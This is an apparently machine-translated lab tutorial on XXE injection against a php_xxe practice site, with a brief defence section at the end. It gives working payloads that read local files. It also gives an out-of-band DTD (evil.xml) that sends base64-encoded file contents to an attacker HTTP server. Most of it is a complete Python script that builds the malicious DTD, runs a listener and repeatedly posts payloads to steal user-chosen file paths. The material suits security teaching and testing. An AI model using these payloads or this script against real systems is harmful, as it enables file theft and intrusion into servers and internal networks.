External entity injection vulnerability

principle

When external entities are allowed to be referenced, external entity injection (XXE) vulnerabilities will result. By constructing malicious content, it may lead to damages such as arbitrary file reading, system command execution, intranet port detection, and intranet website attacks. XXE vulnerabilities are divided into the following two types: XXE with echo and XXE without echo.

Vulnerability display

With the echoed XXE,
we have now created a new hacker.txtfile on the d drive for testing. First, we use burpsuite to capture packets. The shooting range here uses it php_xxe.

This is the code for XML injection, because we found that the data was transmitted in XML format when capturing the packet. The preliminary judgment may have an XML external entity injection vulnerability

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///d:/hacker.txt">
]>

Injection is successful! ! !

Demonstration of XXE without echo
We first open php_xxethe doLogin.phpfile in the directory , comment it out echo $result, and add. error_reporting(0)

You can see that the echo information has disappeared.

For XXE without echo, we need to build an Out-of Band (OOB) channel To read the data. The idea is:

1. The attacker first sends payload1 to the web server
2. Payload1 triggers the web server, the web server obtains the malicious DTD from the VPS and executes payload2
3. payload2 makes the web server use the result as a parameter to access the HTTP service on the VPS
4. The attacker obtained the result through the HTTP access record of the VPS

VPS (Virtual Private Server) technology , a high-quality service that divides a server into multiple virtual private servers. Each vps can be assigned an independent public network IP address, independent operating system, independent large space, independent memory, independent CPU resources, independent execution programs, independent system configuration, etc.

The role of DTD (document type definition) is to define the legal building blocks of an XML document. It uses a series of legal elements to define the document structure. DTD can define legal XML document building blocks. It uses a series of legal elements to define the structure of the document. The DTD can be declared in an XML document in line, or it can be used as an external reference.

Attack process
Let's start Kali's apache2 service first, and then /var/www/htmlcreate a evil.xmlfile in this directory. The content of the file is as follows

<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.75.159/?content=%file;'>"> %payload;

Then modify these contents in burpsuite

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM
"php://filter/read=convert.base64-encode/resource=d:/hacker.txt">
<!ENTITY % dtd SYSTEM "http://192.168.75.159/evil.xml">
%dtd;
%send;
]>

Kali's log information encodes the content of the file with base64, and puts the content after content into the decoder to decode the content of the file. The command to start apache2 and the command to view the log information are

service apache2 start
tail -f /var/log/apache2/access.log

Code automation

Write script related information and modules

#!/usr/bin/python3
# -*- coding: utf-8 -*-


from http.server import HTTPServer,SimpleHTTPRequestHandler
import threading
import requests
import sys

Write the generation function of the attack payload, which can generate the corresponding XML file containing the malicious DTD according to the given IP address and port

# 创建攻击代码文件
def ExportPayload(lip,lport):
    file = open('evil.xml','w')
    file.write("<!ENTITY % payload \"<!ENTITY &#x25; send SYSTEM 'http://{0}:{1}/?content=%file;'>\"> %payload;".format(lip, lport))
    file.close()
    print("[*] Payload文件创建成功!")

Write HTTP service function, implement HTTP service through http.server module to monitor the data returned by the target server

# 开启HTTP服务，接收数据
def StartHTTP(lip,lport):
    # HTTP监听的IP地址和端口
    serverAddr = (lip, lport)
    httpd = HTTPServer(serverAddr, MyHandler)
    print("[*] 正在开启HTTP服务器:\n\n================\nIP地址:{0}\n端口:{1}\n================\n".format(lip, lport))
    httpd.serve_forever()

Write a POST sending function to send attack data to the target server

#通过POST发送攻击数据
def SendData(lip, lport, url):
    # 需要读取的文件的路径(默认值)
    filePath = "d:\\hacker.txt"
    while True:
        # 对用户的输入的文件路径斜杠的替换
        filePath = filePath.replace('\\', "/")
        data = "<?xml version=\"1.0\"?>\n<!DOCTYPE test[\n<!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource={0}\">\n<!ENTITY % dtd SYSTEM \"http://{1}:{2}/evil.xml\">\n%dtd;\n%send;\n]>".format(filePath, lip, lport)
        requests.post(url, data=data)
        # 继续接收用户的输入，读取指定文件
        filePath = input("Input filePath:")

Define a message processing class, this class inherits SimpleHTTPRequestHandler. At the same time, it is necessary to rewrite the original log information function so that it can record the accessed information in the file while outputting the access information.

# 对原生的log_message函数进行重写,在输出结果的同时把结果保存到文件
class MyHandler(SimpleHTTPRequestHandler):
        
    def log_message(self, format, *args):
        # 终端输出HTTP访问信息
        sys.stderr.write("%s - - [%s] %s\n" %
                        (self.client_address[0],
                        self.log_date_time_string(),
                        format%args))
        # 保存信息到文件
        textFile = open("result.txt", "a")
        textFile.write("%s - - [%s] %s\n" %
                        (self.client_address[0], 
                        self.log_date_time_string(),
                        format%args))
        textFile.close()

Write the main function, in which the definition of related variables and function calls

if __name__ == '__main__':
    #本机IP，IP为kali虚拟机的IP
    lip = "192.168.75.159"
    #本机HTTP监听端口，可以使用netstat命令查看apache2监听的端口是多少
    lport = 80
    #目标网站提交表单的URL,IP为物理机的IP
    url = "http://192.168.101.3/xxe-lab/php_xxe/doLogin.php"
    # 创建payload文件
    ExportPayload(lip, lport)
    # HTTP服务线程
    threadHTTP = threading.Thread(target=StartHTTP,args=(lip, lport))
    threadHTTP.start()
    # 发送POST数据线程
    threadPOST = threading.Thread(target=SendData,args=(lip, lport, url))
    threadPOST.start()

The execution effect is shown in the figure below.

Decode the content after content to base64 to see the content of the file,

and save the access records in the result.txt file

Defense strategy

The harm of XXE is not only to attack the server, but also to detect intranet ports and attack intranet websites through XXE. Defense of the way there 默认禁止外部实体的解析and 对用户提交的XML数据进行过滤，如关键词<!DOCTYPE和<!ENTITY 或者 SYSTEM 和 PUBLIC等.